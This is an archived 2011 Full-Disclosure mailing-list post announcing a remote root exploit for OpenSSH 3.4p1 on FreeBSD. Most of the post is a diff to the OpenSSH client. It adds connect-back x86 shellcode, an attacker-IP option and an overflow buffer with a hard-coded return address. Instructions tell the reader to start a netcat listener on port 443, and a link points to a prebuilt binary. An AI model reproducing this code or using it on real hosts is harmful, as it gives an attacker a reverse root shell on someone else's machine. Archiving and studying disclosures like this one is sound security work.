| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 1 Jul 2011 17:45:22 +0200
From: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Working Remote Root Exploit for OpenSSH 3.4p1
(FreeBSD)
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.
the statically linked binary can be downloaded from
http://isowarez.de/ssh_0day
I know these versions are really old, some seem to run
that tough.
-Cheers, King "the archaeologist" Cope
diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z <yourip> <target>\n"
> "setup a netcat, port 443 on yourip first\n\n"
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
> break;
> case 'z':
> myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
>
> extern char *myip;
>
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
>
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists